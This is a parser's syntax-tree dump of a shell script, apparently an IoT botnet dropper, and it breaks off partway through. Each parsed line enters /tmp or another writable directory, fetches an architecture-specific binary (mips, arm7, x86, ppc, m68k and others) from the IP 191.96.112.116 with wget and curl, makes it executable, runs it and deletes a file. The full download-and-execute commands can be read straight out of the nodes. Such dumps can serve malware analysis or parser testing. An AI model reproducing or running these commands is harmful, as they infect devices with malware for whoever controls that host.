ListNode(lineno=2, pos=(12, 175), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://191.96.112.116/k.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 138), parts=[
    WordNode(lineno=2, pos=(102, 106), word='curl'),
    WordNode(lineno=2, pos=(107, 109), word='-O'),
    WordNode(lineno=2, pos=(110, 138), word='http://191.96.112.116/k.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(138, 139)),
  CommandNode(lineno=2, pos=(140, 155), parts=[
    WordNode(lineno=2, pos=(140, 145), word='chmod'),
    WordNode(lineno=2, pos=(146, 148), word='+x'),
    WordNode(lineno=2, pos=(149, 155), word='k.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(155, 156)),
  CommandNode(lineno=2, pos=(157, 165), parts=[
    WordNode(lineno=2, pos=(157, 165), word='./k.mips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(165, 166)),
  CommandNode(lineno=2, pos=(167, 175), parts=[
    WordNode(lineno=2, pos=(167, 169), word='rm'),
    WordNode(lineno=2, pos=(170, 173), word='-rf'),
    WordNode(lineno=2, pos=(174, 175), word='n'),
  ]),
])
ListNode(lineno=3, pos=(176, 347), parts=[
  CommandNode(lineno=3, pos=(176, 183), parts=[
    WordNode(lineno=3, pos=(176, 178), word='cd'),
    WordNode(lineno=3, pos=(179, 183), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(184, 186)),
  CommandNode(lineno=3, pos=(187, 198), parts=[
    WordNode(lineno=3, pos=(187, 189), word='cd'),
    WordNode(lineno=3, pos=(190, 198), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(199, 201)),
  CommandNode(lineno=3, pos=(202, 209), parts=[
    WordNode(lineno=3, pos=(202, 204), word='cd'),
    WordNode(lineno=3, pos=(205, 209), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(210, 212)),
  CommandNode(lineno=3, pos=(213, 221), parts=[
    WordNode(lineno=3, pos=(213, 215), word='cd'),
    WordNode(lineno=3, pos=(216, 221), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(222, 224)),
  CommandNode(lineno=3, pos=(225, 229), parts=[
    WordNode(lineno=3, pos=(225, 227), word='cd'),
    WordNode(lineno=3, pos=(228, 229), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(229, 230)),
  CommandNode(lineno=3, pos=(231, 266), parts=[
    WordNode(lineno=3, pos=(231, 235), word='wget'),
    WordNode(lineno=3, pos=(236, 266), word='http://191.96.112.116/k.mipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(266, 267)),
  CommandNode(lineno=3, pos=(268, 306), parts=[
    WordNode(lineno=3, pos=(268, 272), word='curl'),
    WordNode(lineno=3, pos=(273, 275), word='-O'),
    WordNode(lineno=3, pos=(276, 306), word='http://191.96.112.116/k.mipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(306, 307)),
  CommandNode(lineno=3, pos=(308, 325), parts=[
    WordNode(lineno=3, pos=(308, 313), word='chmod'),
    WordNode(lineno=3, pos=(314, 316), word='+x'),
    WordNode(lineno=3, pos=(317, 325), word='k.mipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(325, 326)),
  CommandNode(lineno=3, pos=(327, 337), parts=[
    WordNode(lineno=3, pos=(327, 337), word='./k.mipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(337, 338)),
  CommandNode(lineno=3, pos=(339, 347), parts=[
    WordNode(lineno=3, pos=(339, 341), word='rm'),
    WordNode(lineno=3, pos=(342, 345), word='-rf'),
    WordNode(lineno=3, pos=(346, 347), word='s'),
  ]),
])
ListNode(lineno=4, pos=(348, 507), parts=[
  CommandNode(lineno=4, pos=(348, 355), parts=[
    WordNode(lineno=4, pos=(348, 350), word='cd'),
    WordNode(lineno=4, pos=(351, 355), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(356, 358)),
  CommandNode(lineno=4, pos=(359, 370), parts=[
    WordNode(lineno=4, pos=(359, 361), word='cd'),
    WordNode(lineno=4, pos=(362, 370), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(371, 373)),
  CommandNode(lineno=4, pos=(374, 381), parts=[
    WordNode(lineno=4, pos=(374, 376), word='cd'),
    WordNode(lineno=4, pos=(377, 381), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(382, 384)),
  CommandNode(lineno=4, pos=(385, 393), parts=[
    WordNode(lineno=4, pos=(385, 387), word='cd'),
    WordNode(lineno=4, pos=(388, 393), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(394, 396)),
  CommandNode(lineno=4, pos=(397, 401), parts=[
    WordNode(lineno=4, pos=(397, 399), word='cd'),
    WordNode(lineno=4, pos=(400, 401), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(401, 402)),
  CommandNode(lineno=4, pos=(403, 435), parts=[
    WordNode(lineno=4, pos=(403, 407), word='wget'),
    WordNode(lineno=4, pos=(408, 435), word='http://191.96.112.116/k.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(435, 436)),
  CommandNode(lineno=4, pos=(437, 472), parts=[
    WordNode(lineno=4, pos=(437, 441), word='curl'),
    WordNode(lineno=4, pos=(442, 444), word='-O'),
    WordNode(lineno=4, pos=(445, 472), word='http://191.96.112.116/k.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(472, 473)),
  CommandNode(lineno=4, pos=(474, 488), parts=[
    WordNode(lineno=4, pos=(474, 479), word='chmod'),
    WordNode(lineno=4, pos=(480, 482), word='+x'),
    WordNode(lineno=4, pos=(483, 488), word='k.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(488, 489)),
  CommandNode(lineno=4, pos=(490, 497), parts=[
    WordNode(lineno=4, pos=(490, 497), word='./k.sh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(497, 498)),
  CommandNode(lineno=4, pos=(499, 507), parts=[
    WordNode(lineno=4, pos=(499, 501), word='rm'),
    WordNode(lineno=4, pos=(502, 505), word='-rf'),
    WordNode(lineno=4, pos=(506, 507), word='o'),
  ]),
])
ListNode(lineno=5, pos=(508, 679), parts=[
  CommandNode(lineno=5, pos=(508, 515), parts=[
    WordNode(lineno=5, pos=(508, 510), word='cd'),
    WordNode(lineno=5, pos=(511, 515), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(516, 518)),
  CommandNode(lineno=5, pos=(519, 530), parts=[
    WordNode(lineno=5, pos=(519, 521), word='cd'),
    WordNode(lineno=5, pos=(522, 530), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(531, 533)),
  CommandNode(lineno=5, pos=(534, 541), parts=[
    WordNode(lineno=5, pos=(534, 536), word='cd'),
    WordNode(lineno=5, pos=(537, 541), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(542, 544)),
  CommandNode(lineno=5, pos=(545, 553), parts=[
    WordNode(lineno=5, pos=(545, 547), word='cd'),
    WordNode(lineno=5, pos=(548, 553), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(554, 556)),
  CommandNode(lineno=5, pos=(557, 561), parts=[
    WordNode(lineno=5, pos=(557, 559), word='cd'),
    WordNode(lineno=5, pos=(560, 561), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(561, 562)),
  CommandNode(lineno=5, pos=(563, 598), parts=[
    WordNode(lineno=5, pos=(563, 567), word='wget'),
    WordNode(lineno=5, pos=(568, 598), word='http://191.96.112.116/k.x86_32'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(598, 599)),
  CommandNode(lineno=5, pos=(600, 638), parts=[
    WordNode(lineno=5, pos=(600, 604), word='curl'),
    WordNode(lineno=5, pos=(605, 607), word='-O'),
    WordNode(lineno=5, pos=(608, 638), word='http://191.96.112.116/k.x86_32'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(638, 639)),
  CommandNode(lineno=5, pos=(640, 657), parts=[
    WordNode(lineno=5, pos=(640, 645), word='chmod'),
    WordNode(lineno=5, pos=(646, 648), word='+x'),
    WordNode(lineno=5, pos=(649, 657), word='k.x86_32'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(657, 658)),
  CommandNode(lineno=5, pos=(659, 669), parts=[
    WordNode(lineno=5, pos=(659, 669), word='./k.x86_32'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(669, 670)),
  CommandNode(lineno=5, pos=(671, 679), parts=[
    WordNode(lineno=5, pos=(671, 673), word='rm'),
    WordNode(lineno=5, pos=(674, 677), word='-rf'),
    WordNode(lineno=5, pos=(678, 679), word='b'),
  ]),
])
ListNode(lineno=6, pos=(680, 843), parts=[
  CommandNode(lineno=6, pos=(680, 687), parts=[
    WordNode(lineno=6, pos=(680, 682), word='cd'),
    WordNode(lineno=6, pos=(683, 687), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(688, 690)),
  CommandNode(lineno=6, pos=(691, 702), parts=[
    WordNode(lineno=6, pos=(691, 693), word='cd'),
    WordNode(lineno=6, pos=(694, 702), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(703, 705)),
  CommandNode(lineno=6, pos=(706, 713), parts=[
    WordNode(lineno=6, pos=(706, 708), word='cd'),
    WordNode(lineno=6, pos=(709, 713), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(714, 716)),
  CommandNode(lineno=6, pos=(717, 725), parts=[
    WordNode(lineno=6, pos=(717, 719), word='cd'),
    WordNode(lineno=6, pos=(720, 725), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(726, 728)),
  CommandNode(lineno=6, pos=(729, 733), parts=[
    WordNode(lineno=6, pos=(729, 731), word='cd'),
    WordNode(lineno=6, pos=(732, 733), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(733, 734)),
  CommandNode(lineno=6, pos=(735, 768), parts=[
    WordNode(lineno=6, pos=(735, 739), word='wget'),
    WordNode(lineno=6, pos=(740, 768), word='http://191.96.112.116/k.arm7'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(768, 769)),
  CommandNode(lineno=6, pos=(770, 806), parts=[
    WordNode(lineno=6, pos=(770, 774), word='curl'),
    WordNode(lineno=6, pos=(775, 777), word='-O'),
    WordNode(lineno=6, pos=(778, 806), word='http://191.96.112.116/k.arm7'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(806, 807)),
  CommandNode(lineno=6, pos=(808, 823), parts=[
    WordNode(lineno=6, pos=(808, 813), word='chmod'),
    WordNode(lineno=6, pos=(814, 816), word='+x'),
    WordNode(lineno=6, pos=(817, 823), word='k.arm7'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(823, 824)),
  CommandNode(lineno=6, pos=(825, 833), parts=[
    WordNode(lineno=6, pos=(825, 833), word='./k.arm7'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(833, 834)),
  CommandNode(lineno=6, pos=(835, 843), parts=[
    WordNode(lineno=6, pos=(835, 837), word='rm'),
    WordNode(lineno=6, pos=(838, 841), word='-rf'),
    WordNode(lineno=6, pos=(842, 843), word='t'),
  ]),
])
ListNode(lineno=7, pos=(844, 1003), parts=[
  CommandNode(lineno=7, pos=(844, 851), parts=[
    WordNode(lineno=7, pos=(844, 846), word='cd'),
    WordNode(lineno=7, pos=(847, 851), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(852, 854)),
  CommandNode(lineno=7, pos=(855, 866), parts=[
    WordNode(lineno=7, pos=(855, 857), word='cd'),
    WordNode(lineno=7, pos=(858, 866), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(867, 869)),
  CommandNode(lineno=7, pos=(870, 877), parts=[
    WordNode(lineno=7, pos=(870, 872), word='cd'),
    WordNode(lineno=7, pos=(873, 877), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(878, 880)),
  CommandNode(lineno=7, pos=(881, 889), parts=[
    WordNode(lineno=7, pos=(881, 883), word='cd'),
    WordNode(lineno=7, pos=(884, 889), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(890, 892)),
  CommandNode(lineno=7, pos=(893, 897), parts=[
    WordNode(lineno=7, pos=(893, 895), word='cd'),
    WordNode(lineno=7, pos=(896, 897), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(897, 898)),
  CommandNode(lineno=7, pos=(899, 931), parts=[
    WordNode(lineno=7, pos=(899, 903), word='wget'),
    WordNode(lineno=7, pos=(904, 931), word='http://191.96.112.116/k.x86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(931, 932)),
  CommandNode(lineno=7, pos=(933, 968), parts=[
    WordNode(lineno=7, pos=(933, 937), word='curl'),
    WordNode(lineno=7, pos=(938, 940), word='-O'),
    WordNode(lineno=7, pos=(941, 968), word='http://191.96.112.116/k.x86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(968, 969)),
  CommandNode(lineno=7, pos=(970, 984), parts=[
    WordNode(lineno=7, pos=(970, 975), word='chmod'),
    WordNode(lineno=7, pos=(976, 978), word='+x'),
    WordNode(lineno=7, pos=(979, 984), word='k.x86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(984, 985)),
  CommandNode(lineno=7, pos=(986, 993), parts=[
    WordNode(lineno=7, pos=(986, 993), word='./k.x86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(993, 994)),
  CommandNode(lineno=7, pos=(995, 1003), parts=[
    WordNode(lineno=7, pos=(995, 997), word='rm'),
    WordNode(lineno=7, pos=(998, 1001), word='-rf'),
    WordNode(lineno=7, pos=(1002, 1003), word='w'),
  ]),
])
ListNode(lineno=8, pos=(1004, 1163), parts=[
  CommandNode(lineno=8, pos=(1004, 1011), parts=[
    WordNode(lineno=8, pos=(1004, 1006), word='cd'),
    WordNode(lineno=8, pos=(1007, 1011), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1012, 1014)),
  CommandNode(lineno=8, pos=(1015, 1026), parts=[
    WordNode(lineno=8, pos=(1015, 1017), word='cd'),
    WordNode(lineno=8, pos=(1018, 1026), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1027, 1029)),
  CommandNode(lineno=8, pos=(1030, 1037), parts=[
    WordNode(lineno=8, pos=(1030, 1032), word='cd'),
    WordNode(lineno=8, pos=(1033, 1037), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1038, 1040)),
  CommandNode(lineno=8, pos=(1041, 1049), parts=[
    WordNode(lineno=8, pos=(1041, 1043), word='cd'),
    WordNode(lineno=8, pos=(1044, 1049), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1050, 1052)),
  CommandNode(lineno=8, pos=(1053, 1057), parts=[
    WordNode(lineno=8, pos=(1053, 1055), word='cd'),
    WordNode(lineno=8, pos=(1056, 1057), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1057, 1058)),
  CommandNode(lineno=8, pos=(1059, 1091), parts=[
    WordNode(lineno=8, pos=(1059, 1063), word='wget'),
    WordNode(lineno=8, pos=(1064, 1091), word='http://191.96.112.116/k.ppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1091, 1092)),
  CommandNode(lineno=8, pos=(1093, 1128), parts=[
    WordNode(lineno=8, pos=(1093, 1097), word='curl'),
    WordNode(lineno=8, pos=(1098, 1100), word='-O'),
    WordNode(lineno=8, pos=(1101, 1128), word='http://191.96.112.116/k.ppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1128, 1129)),
  CommandNode(lineno=8, pos=(1130, 1144), parts=[
    WordNode(lineno=8, pos=(1130, 1135), word='chmod'),
    WordNode(lineno=8, pos=(1136, 1138), word='+x'),
    WordNode(lineno=8, pos=(1139, 1144), word='k.ppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1144, 1145)),
  CommandNode(lineno=8, pos=(1146, 1153), parts=[
    WordNode(lineno=8, pos=(1146, 1153), word='./k.ppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1153, 1154)),
  CommandNode(lineno=8, pos=(1155, 1163), parts=[
    WordNode(lineno=8, pos=(1155, 1157), word='rm'),
    WordNode(lineno=8, pos=(1158, 1161), word='-rf'),
    WordNode(lineno=8, pos=(1162, 1163), word='c'),
  ]),
])
ListNode(lineno=9, pos=(1164, 1307), parts=[
  CommandNode(lineno=9, pos=(1164, 1171), parts=[
    WordNode(lineno=9, pos=(1164, 1166), word='cd'),
    WordNode(lineno=9, pos=(1167, 1171), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1172, 1174)),
  CommandNode(lineno=9, pos=(1175, 1186), parts=[
    WordNode(lineno=9, pos=(1175, 1177), word='cd'),
    WordNode(lineno=9, pos=(1178, 1186), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1187, 1189)),
  CommandNode(lineno=9, pos=(1190, 1197), parts=[
    WordNode(lineno=9, pos=(1190, 1192), word='cd'),
    WordNode(lineno=9, pos=(1193, 1197), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1198, 1200)),
  CommandNode(lineno=9, pos=(1201, 1209), parts=[
    WordNode(lineno=9, pos=(1201, 1203), word='cd'),
    WordNode(lineno=9, pos=(1204, 1209), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1210, 1212)),
  CommandNode(lineno=9, pos=(1213, 1217), parts=[
    WordNode(lineno=9, pos=(1213, 1215), word='cd'),
    WordNode(lineno=9, pos=(1216, 1217), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1217, 1218)),
  CommandNode(lineno=9, pos=(1219, 1247), parts=[
    WordNode(lineno=9, pos=(1219, 1223), word='wget'),
    WordNode(lineno=9, pos=(1224, 1247), word='http://191.96.112.116/f'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1247, 1248)),
  CommandNode(lineno=9, pos=(1249, 1280), parts=[
    WordNode(lineno=9, pos=(1249, 1253), word='curl'),
    WordNode(lineno=9, pos=(1254, 1256), word='-O'),
    WordNode(lineno=9, pos=(1257, 1280), word='http://191.96.112.116/f'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1280, 1281)),
  CommandNode(lineno=9, pos=(1282, 1292), parts=[
    WordNode(lineno=9, pos=(1282, 1287), word='chmod'),
    WordNode(lineno=9, pos=(1288, 1290), word='+x'),
    WordNode(lineno=9, pos=(1291, 1292), word='f'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1292, 1293)),
  CommandNode(lineno=9, pos=(1294, 1297), parts=[
    WordNode(lineno=9, pos=(1294, 1297), word='./f'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1297, 1298)),
  CommandNode(lineno=9, pos=(1299, 1307), parts=[
    WordNode(lineno=9, pos=(1299, 1301), word='rm'),
    WordNode(lineno=9, pos=(1302, 1305), word='-rf'),
    WordNode(lineno=9, pos=(1306, 1307), word='f'),
  ]),
])
ListNode(lineno=10, pos=(1308, 1471), parts=[
  CommandNode(lineno=10, pos=(1308, 1315), parts=[
    WordNode(lineno=10, pos=(1308, 1310), word='cd'),
    WordNode(lineno=10, pos=(1311, 1315), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1316, 1318)),
  CommandNode(lineno=10, pos=(1319, 1330), parts=[
    WordNode(lineno=10, pos=(1319, 1321), word='cd'),
    WordNode(lineno=10, pos=(1322, 1330), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1331, 1333)),
  CommandNode(lineno=10, pos=(1334, 1341), parts=[
    WordNode(lineno=10, pos=(1334, 1336), word='cd'),
    WordNode(lineno=10, pos=(1337, 1341), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1342, 1344)),
  CommandNode(lineno=10, pos=(1345, 1353), parts=[
    WordNode(lineno=10, pos=(1345, 1347), word='cd'),
    WordNode(lineno=10, pos=(1348, 1353), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1354, 1356)),
  CommandNode(lineno=10, pos=(1357, 1361), parts=[
    WordNode(lineno=10, pos=(1357, 1359), word='cd'),
    WordNode(lineno=10, pos=(1360, 1361), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1361, 1362)),
  CommandNode(lineno=10, pos=(1363, 1396), parts=[
    WordNode(lineno=10, pos=(1363, 1367), word='wget'),
    WordNode(lineno=10, pos=(1368, 1396), word='http://191.96.112.116/k.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1396, 1397)),
  CommandNode(lineno=10, pos=(1398, 1434), parts=[
    WordNode(lineno=10, pos=(1398, 1402), word='curl'),
    WordNode(lineno=10, pos=(1403, 1405), word='-O'),
    WordNode(lineno=10, pos=(1406, 1434), word='http://191.96.112.116/k.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1434, 1435)),
  CommandNode(lineno=10, pos=(1436, 1451), parts=[
    WordNode(lineno=10, pos=(1436, 1441), word='chmod'),
    WordNode(lineno=10, pos=(1442, 1444), word='+x'),
    WordNode(lineno=10, pos=(1445, 1451), word='k.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1451, 1452)),
  CommandNode(lineno=10, pos=(1453, 1461), parts=[
    WordNode(lineno=10, pos=(1453, 1461), word='./k.m68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1461, 1462)),
  CommandNode(lineno=10, pos=(1463, 1471), parts=[
    WordNode(lineno=10, pos=(1463, 1465), word='rm'),
    WordNode(lineno=10, pos=(1466, 1469), word='-rf'),
    WordNode(lineno=10, pos=(1470, 1471), word='p'),
  ]),
])
ListNode(lineno=11, pos=(1472, 1615), parts=[
  CommandNode(lineno=11, pos=(1472, 1479), parts=[
    WordNode(lineno=11, pos=(1472, 1474), word='cd'),
    WordNode(lineno=11, pos=(1475, 1479), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1480, 1482)),
  CommandNode(lineno=11, pos=(1483, 1494), parts=[
    WordNode(lineno=11, pos=(1483, 1485), word='cd'),
    WordNode(lineno=11, pos=(1486, 1494), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1495, 1497)),
  CommandNode(lineno=11, pos=(1498, 1505), parts=[
    WordNode(lineno=11, pos=(1498, 1500), word='cd'),
    WordNode(lineno=11, pos=(1501, 1505), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1506, 1508)),
  CommandNode(lineno=11, pos=(1509, 1517), parts=[
    WordNode(lineno=11, pos=(1509, 1511), word='cd'),
    WordNode(lineno=11, pos=(1512, 1517), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1518, 1520)),
  CommandNode(lineno=11, pos=(1521, 1525), parts=[
    WordNode(lineno=11, pos=(1521, 1523), word='cd'),
    WordNode(lineno=11, pos=(1524, 1525), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1525, 1526)),
  CommandNode(lineno=11, pos=(1527, 1555), parts=[
    WordNode(lineno=11, pos=(1527, 1531), word='wget'),
    WordNode(lineno=11, pos=(1532, 1555), word='http://191.96.112.116/k'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1555, 1556)),
  CommandNode(lineno=11, pos=(1557, 1588), parts=[
    WordNode(lineno=11, pos=(1557, 1561), word='curl'),
    WordNode(lineno=11, pos=(1562, 1564), word='-O'),
    WordNode(lineno=11, pos=(1565, 1588), word='http://191.96.112.116/k'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1588, 1589)),
  CommandNode(lineno=11, pos=(1590, 1600), parts=[
    WordNode(lineno=11, pos=(1590, 1595), word='chmod'),
    WordNode(lineno=11, pos=(1596, 1598), word='+x'),
    WordNode(lineno=11, pos=(1599, 1600), word='k'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1600, 1601)),
  CommandNode(lineno=11, pos=(1602, 1605), parts=[
    WordNode(lineno=11, pos=(1602, 1605), word='./k'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1605, 1606)),
  CommandNode(lineno=11, pos=(1607, 1615), parts=[
    WordNode(lineno=11, pos=(1607, 1609), word='rm'),
    WordNode(lineno=11, pos=(1610, 1613), word='-rf'),
    WordNode(lineno=11, pos=(1614, 1615), word='k'),
  ]),
])
ListNode(lineno=12, pos=(1616, 1759), parts=[
  CommandNode(lineno=12, pos=(1616, 1623), parts=[
    WordNode(lineno=12, pos=(1616, 1618), word='cd'),
    WordNode(lineno=12, pos=(1619, 1623), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1624, 1626)),
  CommandNode(lineno=12, pos=(1627, 1638), parts=[
    WordNode(lineno=12, pos=(1627, 1629), word='cd'),
    WordNode(lineno=12, pos=(1630, 1638), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1639, 1641)),
  CommandNode(lineno=12, pos=(1642, 1649), parts=[
    WordNode(lineno=12, pos=(1642, 1644), word='cd'),
    WordNode(lineno=12, pos=(1645, 1649), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1650, 1652)),
  CommandNode(lineno=12, pos=(1653, 1661), parts=[
    WordNode(lineno=12, pos=(1653, 1655), word='cd'),
    WordNode(lineno=12, pos=(1656, 1661), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1662, 1664)),
  CommandNode(lineno=12, pos=(1665, 1669), parts=[
    WordNode(lineno=12, pos=(1665, 1667), word='cd'),
    WordNode(lineno=12, pos=(1668, 1669), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1669, 1670)),
  CommandNode(lineno=12, pos=(1671, 1699), parts=[
    WordNode(lineno=12, pos=(1671, 1675), word='wget'),
    WordNode(lineno=12, pos=(1676, 1699), word='http://191.96.112.116/h'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1699, 1700)),
  CommandNode(lineno=12, pos=(1701, 1732), parts=[
    WordNode(lineno=12, pos=(1701, 1705), word='curl'),
    WordNode(lineno=12, pos=(1706, 1708), word='-O'),
    WordNode(lineno=12, pos=(1709, 1732), word='http://191.96.112.116/h'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1732, 1733)),
  CommandNode(lineno=12, pos=(1734, 1744), parts=[
    WordNode(lineno=12, pos=(1734, 1739), word='chmod'),
    WordNode(lineno=12, pos=(1740, 1742), word='+x'),
    WordNode(lineno=12, pos=(1743, 1744), word='h'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1744, 1745)),
  CommandNode(lineno=12, pos=(1746, 1749), parts=[
    WordNode(lineno=12, pos=(1746, 1749), word='./h'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1749, 1750)),
  CommandNode(lineno=12, pos=(1751, 1759), parts=[
    WordNode(lineno=12, pos=(1751, 1753), word='rm'),
    WordNode(lineno=12, pos=(1754, 1757), word='-rf'),
    WordNode(lineno=12, pos=(1758, 1759), word='h'),
  ]),
])
ListNode(lineno=13, pos=(1760, 1903), parts=[
  CommandNode(lineno=13, pos=(1760, 1767), parts=[
    WordNode(lineno=13, pos=(1760, 1762), word='cd'),
    WordNode(lineno=13, pos=(1763, 1767), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1768, 1770)),
  CommandNode(lineno=13, pos=(1771, 1782), parts=[
    WordNode(lineno=13, pos=(1771, 1773), word='cd'),
    WordNode(lineno=13, pos=(1774, 1782), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1783, 1785)),
  CommandNode(lineno=13, pos=(1786, 1793), parts=[
    WordNode(lineno=13, pos=(1786, 1788), word='cd'),
    WordNode(lineno=13, pos=(1789, 1793), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1794, 1796)),
  CommandNode(lineno=13, pos=(1797, 1805), parts=[
    WordNode(lineno=13, pos=(1797, 1799), word='cd'),
    WordNode(lineno=13, pos=(1800, 1805), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1806, 1808)),
  CommandNode(lineno=13, pos=(1809, 1813), parts=[
    WordNode(lineno=13, pos=(1809, 1811), word='cd'),
    WordNode(lineno=13, pos=(1812, 1813), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1813, 1814)),
  CommandNode(lineno=13, pos=(1815, 1843), parts=[
    WordNode(lineno=13, pos=(1815, 1819), word='wget'),
